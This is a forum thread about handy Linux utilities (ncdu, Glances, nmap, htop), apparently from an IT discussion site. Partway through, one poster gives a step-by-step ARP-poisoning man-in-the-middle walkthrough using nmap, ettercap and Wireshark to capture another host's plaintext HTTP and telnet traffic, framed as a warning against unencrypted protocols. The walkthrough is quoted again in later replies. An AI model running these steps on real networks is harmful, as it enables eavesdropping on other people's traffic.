ML
    • Recent
    • Categories
    • Tags
    • Popular
    • Users
    • Groups
    • Register
    • Login

    Handy Linux Utilities

    IT Discussion
    7
    18
    1.3k
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • M
      marcinozga
      last edited by

      docker.PNG

      Docker image, extracted. That's huge for alpine based.

      1 Reply Last reply Reply Quote 0
      • CloudKnightC
        CloudKnight @marcinozga
        last edited by

        @marcinozga said in Handy Linux Utilities:

        @stuartjordan said in Handy Linux Utilities:

        I'll start With a couple and will add more

        NCDU: A utility to track down where high file usage is being used:

        I love it and use all the time.

        Glances: A nice resource usage utility:

        I have a mixed feelings about this one. It's really useful but it's rather bloated, close to 100MB with all dependencies. Docker images are even worse, developer was hesitant with Alpine based images.

        NMAP: Network scan/Security scan with Vulnerability scripts:

        Classic. No comments needed.

        Terminator (gnome) - A different terminal that you can split into multiple terminals:

        I've never used it, I don't have any Linux desktops to try it. Killer name though.

        Some servers I use Htop but I do like Glances though, I use it on my home machine for example.

        1 Reply Last reply Reply Quote 1
        • 1
          1337 @travisdh1
          last edited by 1337

          @travisdh1 said in Handy Linux Utilities:

          @marcinozga said in Handy Linux Utilities:

          glances1.PNG

          Ubuntu 21.04

          I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

          I'm not a Glances users but looking at it it uses python and psUtils so it's a pretty complicated way of monitoring system resources. So it has more dependencies. Not your typical C unix utility, so to speak.

          But you might be able to keep it contained by not installing all recommended packages. Just add the --no-install-recommends options.

          If there is some package among the recommended ones that you need, you can just install it yourself.

          travisdh1T 1 Reply Last reply Reply Quote 0
          • travisdh1T
            travisdh1 @1337
            last edited by

            @pete-s said in Handy Linux Utilities:

            @travisdh1 said in Handy Linux Utilities:

            @marcinozga said in Handy Linux Utilities:

            glances1.PNG

            Ubuntu 21.04

            I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

            I'm not a Glances users but looking at it it uses python and psUtils so it's a pretty complicated way of monitoring system resources. So it has more dependencies. Not your typical C unix utility, so to speak.

            But you might be able to keep it contained by not installing all recommended packages. Just add the --no-install-recommends options.

            If there is some package among the recommended ones that you need, you can just install it yourself.

            Yep, Glances is not the normal very small and efficient program. It's the best thing I've found for giving a good idea of overall system performance without having to switch between multiple different programs to look at everything tho.

            1 1 Reply Last reply Reply Quote 1
            • 1
              1337 @travisdh1
              last edited by

              @travisdh1 said in Handy Linux Utilities:

              @pete-s said in Handy Linux Utilities:

              @travisdh1 said in Handy Linux Utilities:

              @marcinozga said in Handy Linux Utilities:

              glances1.PNG

              Ubuntu 21.04

              I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

              I'm not a Glances users but looking at it it uses python and psUtils so it's a pretty complicated way of monitoring system resources. So it has more dependencies. Not your typical C unix utility, so to speak.

              But you might be able to keep it contained by not installing all recommended packages. Just add the --no-install-recommends options.

              If there is some package among the recommended ones that you need, you can just install it yourself.

              Yep, Glances is not the normal very small and efficient program. It's the best thing I've found for giving a good idea of overall system performance without having to switch between multiple different programs to look at everything tho.

              Makes sense. I usually monitor performance outside of the OS - if it's a VM and it usually is.

              1 Reply Last reply Reply Quote 1
              • CloudKnightC
                CloudKnight
                last edited by

                Why we must warn people not to use non encrypted traffic:
                Do Not Use Telnet,Ftp or standard http

                Here we will do an arp poison man in the middle attack to see another devices traffic on the same network. when we just had hubs this was easier now we have switches we have to use this method:

                1. apt install wireshark (Graphical)
                2. apt install nmap
                3. apt install etttercap-text-only (there is a graphical version, this is cli only)
                4. sudo nmap -sn 192.168.1.0/24
                5. descover hosts IP and mac addresses / pick a host.
                6. sudo ettercap -T(txt only) -S(no ssl) -i(interface) wlan0 -M(man in the middle attack) arp:remote /192.168.1.1(router)// //192.168.1.8//(person to attack)
                7. sudo wireshark then apply filter ip.addr = 192.168.1.8
                8. obviously cannot see inside encrypted ssl traffic.
                9. but we can see plain text packets by applying filter ip.addr == 192.168.1.8 && http
                10. save in wireshark as pcap file
                11. visit website a-packets.com - generates a report for free.
                12. to see telnet as it's clear text use filter = wireshark filter ip.addr = = 192.168.1.8 && telnet
                pmonchoP dafyreD 2 Replies Last reply Reply Quote 0
                • pmonchoP
                  pmoncho @CloudKnight
                  last edited by

                  @stuartjordan said in Handy Linux Utilities:

                  Why we must warn people not to use non encrypted traffic:
                  Do Not Use Telnet,Ftp or standard http

                  Here we will do an arp poison man in the middle attack to see another devices traffic on the same network. when we just had hubs this was easier now we have switches we have to use this method:

                  1. sudo ettercap -T(txt only) -S(no ssl) -i(interface) wlan0 -M(man in the middle attack) arp:remote /192.168.1.1(router)// //192.168.1.8//(person to attack)

                  In this example, ettercap has the ability to see packets (the conversation) on a switched network between two different end points?

                  CloudKnightC 1 Reply Last reply Reply Quote 0
                  • CloudKnightC
                    CloudKnight @pmoncho
                    last edited by

                    @pmoncho yes while the man in the middle still passes the packets through to the router and back to the client. If they are using a basic hub (layer 1) rather then a switch don't need to do this at all. just fire up wireshark as hubs don't use mac addresses.

                    1 1 Reply Last reply Reply Quote 1
                    • 1
                      1337 @CloudKnight
                      last edited by 1337

                      @stuartjordan said in Handy Linux Utilities:

                      @pmoncho yes while the man in the middle still passes the packets through to the router and back to the client. If they are using a basic hub (layer 1) rather then a switch don't need to do this at all. just fire up wireshark as hubs don't use mac addresses.

                      Haven't seen a hub in decades. But setting up a mirror port on a switch will work exactly the same.

                      Also you only need wireshark for the analysis of the dumped traffic. tcpdump is the utility for capturing the traffic.

                      CloudKnightC 1 Reply Last reply Reply Quote 0
                      • CloudKnightC
                        CloudKnight @1337
                        last edited by CloudKnight

                        @pete-s You can setup a mirror port if you have admin access to the switch. which hopefully isn't left with the default login settings.

                        1 Reply Last reply Reply Quote 3
                        • dafyreD
                          dafyre @CloudKnight
                          last edited by

                          @stuartjordan said in Handy Linux Utilities:

                          Why we must warn people not to use non encrypted traffic:
                          Do Not Use Telnet,Ftp or standard http

                          Here we will do an arp poison man in the middle attack to see another devices traffic on the same network. when we just had hubs this was easier now we have switches we have to use this method:

                          1. apt install wireshark (Graphical)
                          2. apt install nmap
                          3. apt install etttercap-text-only (there is a graphical version, this is cli only)
                          4. sudo nmap -sn 192.168.1.0/24
                          5. descover hosts IP and mac addresses / pick a host.
                          6. sudo ettercap -T(txt only) -S(no ssl) -i(interface) wlan0 -M(man in the middle attack) arp:remote /192.168.1.1(router)// //192.168.1.8//(person to attack)
                          7. sudo wireshark then apply filter ip.addr = 192.168.1.8
                          8. obviously cannot see inside encrypted ssl traffic.
                          9. but we can see plain text packets by applying filter ip.addr == 192.168.1.8 && http
                          10. save in wireshark as pcap file
                          11. visit website a-packets.com - generates a report for free.
                          12. to see telnet as it's clear text use filter = wireshark filter ip.addr = = 192.168.1.8 && telnet

                          I had a student do this to the student network at my last job. Everybody would complain about slow network in one building but by the time I could go check it, it was fine again. I figured out what he was doing and some switches have stuff built in to combat this (you just have to turn it on).

                          1 Reply Last reply Reply Quote 1
                          • 1 / 1
                          • First post
                            Last post